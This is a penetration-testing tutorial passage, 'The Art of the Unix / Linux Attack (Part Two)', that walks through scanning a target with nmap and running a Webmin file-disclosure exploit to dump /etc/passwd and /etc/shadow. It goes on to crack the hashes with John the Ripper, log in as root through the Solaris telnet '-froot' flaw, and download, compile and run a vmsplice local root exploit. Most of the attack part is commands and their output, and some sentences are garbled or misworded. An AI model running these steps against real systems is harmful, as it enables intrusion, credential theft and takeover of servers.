The Art of the Unix / Linux Attack (Part Two)
This Section will open with an article from Unixlegion discussing network vulnerabilities. It shows that, though The Art of the Unix and Linux Attack lesson may be considered outdated by some, a large portion of its general principles still apply even as technology advances.
Now that you have finished with Grey-Box Attack – The Art of Microsoft Windows Attack, it is time to move on to part of this tutorial: The Art of the Unix / Linux Attack.
We cover the following material:
[0x02a] – Scanning and Enumeration
[0x02b] – Gaining Access
[0x02c] – Escalating Privilege
[0x02] – The Art of Unix / Linux Attack
[0x02a] Linux Attack- Scanning & Enumeration
The first thing of importance before beginning a Unix / Linux attack is to gather as much information as possible.
Any and all information that can be collected can be used to guess passwords, locate the best points of attack, and other pertinent information.
Remember: no little bit of information is useless or a waste of time collecting. The smallest thing could end up becoming a huge clue further on down the line.
As was discussed in the first section, an attacker’s favorite tool is nmap; it is what attachers use to scan the target system. The reader should already grasp the idea of port forwarding and the use of specific kinds of software with only one command.
bt cwh # nmap -sV www.target.com Starting Nmap 4.76 ( http://nmap.org) Interesting ports on 192.168.0.111: Not shown: 987 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.6 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 25/tcp open smtp Cisco PIX sanitized smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g) 111/tcp filtered rpcbind 443/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g) 554/tcp filtered rtsp 1720/tcp filtered H.323/Q.931 2000/tcp filtered callbook 3306/tcp open mysql MySQL (unauthorized) 5060/tcp filtered sip 10000/tcp open http Webmin httpd Service Info: OSs: Unix, Linux; Device: firewall Service detection performed. Please report any incorrect results at http://nmap.org/submit/ Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
In the result, one can see the system uses Webmin but it is unclear what the exact version is. Webmin is used to expose file disclosure vulnerabilities in version 1.290. In order to find Webmin, one must only go to http://milw0rm.com/exploits/2017.
Note: A vulnerability disclosure is an implementation of reporting security weaknesses in computer hardware and software.
bt cwh # perl 2017.pl www.target.com 10000 http /etc/passwd root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/log:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games:/bin/false ftp:x:14:50::/home/ftp:/bin/false smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/:/bin/false gdm:x:42:42:GDM:/var/state/gdm:/bin/bash apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false pop:x:90:90:POP:/:/bin/false nobody:x:99:99:nobody:/:/bin/false snort:x:1000:102::/home/snort:/bin/false user1:x:1001:100::/home/user1: One should note that the admin is outdated.
[0x02b] Linux Attack- Gaining Access
As the target is a Linux server, it is more difficult than a windows server to attack remotely.
Most remote exploits capable of impacting Linux are third-party software, such as
File Transfer Protocol (FTP) and Secure Shell (SSH) web server. Attackers gain access to Linux servers by exploiting third party running services.
The most vital bits of information found in running third party services are the users’ information, usually located through web application vulnerabilities. Attackers then employ brute-force techniques, as well as social engineering to obtain information on valid users. In this case, it is highly recommended to use the command below.
bt cwh # Perl 2017.pl www.target.com 10000 HTTP /etc/shadow
The purpose of this command is to read the /etc/shadow file
root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: apache:*:9797:0::::: messagebus:*:9797:0::::: haldaemon:*:9797:0::::: nobody:*:9797:0::::: snort:!:13986:0:99999:7::: user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::
The results are entered in the shadow.txt file. Then the attacker attempts to crack the systems’ passwords using John the Ripper.
We put the result in file shadow.txt and then try to crack passwords by using John the Ripper. (dict.lst is dictionary file)
bt cwh # john --wordlist=dict.lst shadow.txt <em>Load two password hashes with two different salts</em> ( FreeBSD MD5 [32/32]) user1 (user1) guesses: 1 time: 0:00:00:00 100% c/s: 150 trying: abc
This defines the password of “user one” as “user1” and cannot locate the password for root. The Linux attack should allow the individual to log in to the target system by using the credentials of “user1.” Once the attacker is inside the system, they must figure out a way to increase their user privileges.
An additional example is a telnet vulnerability on Solaris 10/11. This vulnerability allows the attacker to log in with little to no resistance with root privilege. The attacker simply sends [telnet “-froot” 192.168.0.112] to the telnet daemon on Solaris 10/11.
bt cwh # telnet "-froot" 192.168.0.112 Using: 192.168.0.112 Connected to 192.168.0.112. Escape character is '^]'. Last login: Sun Jun 30 02:02:02 from 192.168.0.2 Sun Microsystems Inc. SunOS 5.10 Generic January 2007 # id uid=0(root) gid=0(root) #
By using this technique, there is no need to escalate privilege since the attacker is already logged in under root privilege.
[0x02c] – Escalating Privilege
This article has been an introduction to a Linux attack that exploits the Linux system’s local root. These useful exploits can be found at milworm.com. The initial tasks after one has gained access to the Linux system are to check Linux kernel version and the user ID.
[email protected]:~$ uname -a Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux [email protected]:~$ id uid=1001(user1) gid=1001(user1) groups=1001(user1)
The two commands used in this Linux attack are used to elevate the attacker’s privilege, making them the system’s root. Thus it should be mentioned that there is a local root exploit for Linux 2.6.17 – 2.6.24 on milworm.com. Once the root exploit is downloaded, compiled, and it is running, it will look like shown below.
[email protected]:~$ wget http://milw0rm.com/exploits/5092 --17:17:21-- http://milw0rm.com/exploits/5092 => `5092' Resolving milw0rm.com... 76.74.9.18 Connecting to milw0rm.com|76.74.9.18|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [ >>> ] 7,197 11.58K/s 17:17:23 (11.58 KB/s) - `5092' saved [7197] [email protected]:~$ gcc -o 5092 5092.c 5092.c:289:28: warning: no newline at end of file [email protected]:~$ ./5092 ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7e79000 .. 0xb7eab000 [+] root [email protected]:~# id uid=0(root) gid=0(root) groups=1001(root)
At this point, the attacker has, in essence, become the root of the targeted system’s server.
When you are done studying this section, please continue to SQL Injection Cheat Sheet | Auto Pwn | Metasploit.